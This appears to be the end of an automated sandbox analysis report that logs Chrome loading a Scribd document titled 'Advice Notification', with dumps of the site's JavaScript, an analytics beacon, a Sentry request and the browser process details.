                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 39 5d 2c 7b 35 32 32 31 39 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 5f 7d 29 3b 76 61 72 20 72 3d 61 28 33 38 35 34 34 29 2c 6e 3d 61 28 36 32 38 33 32 29 2c 73 3d 61 2e 6e 28 6e 29 2c 6f 3d 61 28 34 30 38 38 30 29 2c 69 3d 61 28 39 36 35 34 30 29 2c 6c 3d 61 28 33 38 39 37 39 29 2c 64 3d 61 28 31 31 38 36 35 29 2c 75 3d 61 28 35 31 33 33 36 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[219],{52219:(e,t,a)=>{a.r(t),a.d(t,{default:()=>_});var r=a(38544),n=a(62832),s=a.n(n),o=a(40880),i=a(96540),l=a(38979),d=a(11865),u=a(51336);function p(e,
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 61 63 74 69 6f 6e 73 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 6e 46 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 28 29 28 7b 6c 6f 61 64 69 6e 67 3a 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 7d 29 2c 64 69 73 61 62 6c 65 64 3a 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2c 6f 6e 43 6c 69 63 6b 3a 74 68 69 73 2e 68 61 6e 64 6c 65 43 6c 69 63 6b 7d 2c 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 3f 6f 2e 41 2e 74 28 22 70 64 66 73 2e 6c 69 67 68 74 62 6f 78 65 73 2e 64 6f 77 6e 6c 6f 61 64 5f 6c 69 67 68 74 62 6f 78 2e 72 65 73 75 6d 69 6e 67 22 29 3a 6f 2e 41 2e 74 28 22 70 64 66 73 2e 6c 69 67 68 74 62 6f 78 65 73 2e 64 6f 77 6e 6c 6f 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ement("div",{className:"actions"},i.createElement(l.nF,{className:s()({loading:this.state.loading}),disabled:this.state.loading,onClick:this.handleClick},this.state.loading?o.A.t("pdfs.lightboxes.download_lightbox.resuming"):o.A.t("pdfs.lightboxes.downloa
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC612INData Raw: 61 6c 5f 63 6f 6e 74 65 6e 74 5f 63 6f 6d 70 6f 6e 65 6e 74 22 2c 74 68 69 73 2e 61 64 64 57 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 73 28 29 29 7d 67 65 74 4d 6f 64 61 6c 54 69 74 6c 65 45 6c 65 6d 65 6e 74 28 7b 74 69 74 6c 65 3a 65 2c 63 6c 61 73 73 4e 61 6d 65 3a 74 3d 22 22 2c 65 32 65 4e 61 6d 65 3a 61 3d 22 22 7d 29 7b 63 6f 6e 73 74 7b 61 72 69 61 5f 6c 61 62 65 6c 3a 72 2c 69 64 3a 6f 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 32 22 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 72 2c 69 64 3a 60 6d 6f 64 61 6c 5f 74 69 74 6c 65 5f 24 7b 6f 7d 60 2c 63 6c 61 73 73 4e 61 6d 65 3a 6e 28 29 28 22 74 69 74 6c 65 22 2c 74 29 2c 22 64 61 74 61 2d 65 32 65 22 3a 61 7d 2c 65 29 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: al_content_component",this.addWrapperClassNames())}getModalTitleElement({title:e,className:t="",e2eName:a=""}){const{aria_label:r,id:o}=this.props;return s.createElement("h2",{"aria-label":r,id:`modal_title_${o}`,className:n()("title",t),"data-e2e":a},e)}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        148192.168.2.164989634.102.232.424436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1499OUTGET /images/265007.gif?tm=74&r=874168399&v=111&cs=UTF-8&h=www.scribd.com&l=en-US&S=5e543256c480ac577d30f76f9120eb74&uu=88cc5efd775d85316f8301f58ee373f&t=Advice%20Notification%20%7C%20PDF&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=864980724ce0e4610faf43e7780d8361&fph=487f7b22f68312d2c1bbc93b1aea445b&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=487f7b22f68312d2c1bbc93b1aea445b&fad=124.04347527516074&z=z HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: hexagon-analytics.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC54INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2bGIF89a!,D;0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        149192.168.2.164989735.186.247.1564436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC463OUTGET /api/282187/envelope/?sentry_key=21588782029b459685064c03453673ff&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.19.0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: sentry.io
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC552INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        allow: POST
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 0
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                        Start time:16:59:10
                                                                                                                                                                                                                                                                                                                                                                                        Start date:06/12/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                        Start time:16:59:10
                                                                                                                                                                                                                                                                                                                                                                                        Start date:06/12/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1788,i,12476349123992413655,12045162974044281250,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                        Start time:16:59:11
                                                                                                                                                                                                                                                                                                                                                                                        Start date:06/12/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        No disassembly